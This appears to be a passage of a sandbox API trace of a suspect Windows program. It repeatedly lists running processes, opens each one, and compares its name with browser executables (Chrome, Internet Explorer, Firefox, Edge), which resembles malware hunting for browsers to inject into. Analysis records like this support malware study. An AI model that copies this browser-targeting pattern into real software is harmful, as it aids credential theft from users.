	[0255.531] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0255.532] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0xafdc
	[0255.532] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.532] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0255.532] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.532] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.533] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.533] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0255.533] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.533] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.533] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0255.534] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0xafe0
	[0255.534] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.534] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0255.534] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.534] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.535] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.535] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0255.535] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.535] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.535] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.536] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0xafe4
	[0255.536] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.536] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.537] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.537] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.537] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.537] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.537] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.537] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.538] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.538] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.539] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0xafe8
	[0255.539] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.539] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.540] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.540] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.540] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.540] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.540] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.540] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.540] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.541] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0xafec
	[0255.541] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.541] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.542] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.542] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.542] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.542] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.542] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.542] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.542] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0255.543] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0xaff0
	[0255.543] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.543] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0255.544] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.544] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.544] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.544] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0255.545] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.545] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.545] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.546] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0xaff4
	[0255.546] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.546] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.546] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.546] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.547] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.547] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.547] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.547] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.547] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.548] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0xaff8
	[0255.548] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.548] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.548] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.548] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.549] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.549] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.549] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.549] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.549] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0255.550] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbb4) returned 0xaffc
	[0255.550] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.550] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0255.550] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.550] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.551] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.551] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0255.551] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.551] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.551] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0255.552] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbc0) returned 0xb004
	[0255.552] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.552] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.552] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.552] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.553] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.553] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.553] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.553] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.553] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0255.554] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x950) returned 0xb008
	[0255.554] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.554] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0255.554] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.554] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.554] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.555] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0255.555] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.555] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.555] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.556] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x748) returned 0xb00c
	[0255.556] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.556] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.556] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.556] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.556] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.556] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.557] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.557] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.557] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0255.558] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xd70) returned 0xb010
	[0255.558] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.558] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0255.558] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.558] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.558] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.559] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0255.559] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.559] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.559] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0255.560] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xd6c) returned 0xb014
	[0255.560] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.560] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.561] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.561] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.561] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.561] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.561] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.561] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.562] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xd70, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0255.562] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xed4) returned 0xb018
	[0255.562] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.562] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0255.563] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.563] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.563] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.563] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0255.563] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.563] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.563] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xd70, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 0
	[0255.564] CloseHandle (hObject=0x4fd0) returned 1
	[0255.564] Sleep (dwMilliseconds=0x64) 
	[0255.669] GetCurrentProcessId () returned 0x110
	[0255.669] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0255.671] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0255.672] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0255.673] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0255.674] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0xb01c
	[0255.674] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.674] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0255.674] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.674] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.675] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.675] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0255.675] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.675] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.675] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0255.676] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0xb020
	[0255.676] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.676] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0255.676] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.676] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.677] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.677] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0255.677] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.677] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.677] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0255.678] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0xb024
	[0255.678] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.678] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0255.678] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.678] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.679] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.679] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0255.679] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.679] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.679] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0255.680] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0xb028
	[0255.680] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.680] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0255.681] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.681] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.681] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.681] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0255.681] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.681] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.681] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0255.682] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0xb02c
	[0255.682] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.682] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0255.683] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.683] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.683] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.683] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0255.683] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.683] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.683] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0255.684] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0xb030
	[0255.684] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.684] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0255.685] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.685] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.685] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.685] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0255.685] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.686] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.686] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0255.686] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0xb034
	[0255.687] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.687] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0255.687] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.687] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.687] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.687] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0255.687] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.687] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.688] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0255.688] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0xb038
	[0255.689] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.689] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0255.689] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.689] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.689] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.689] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0255.689] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.689] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.690] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.690] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0xb03c
	[0255.690] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.690] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.691] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
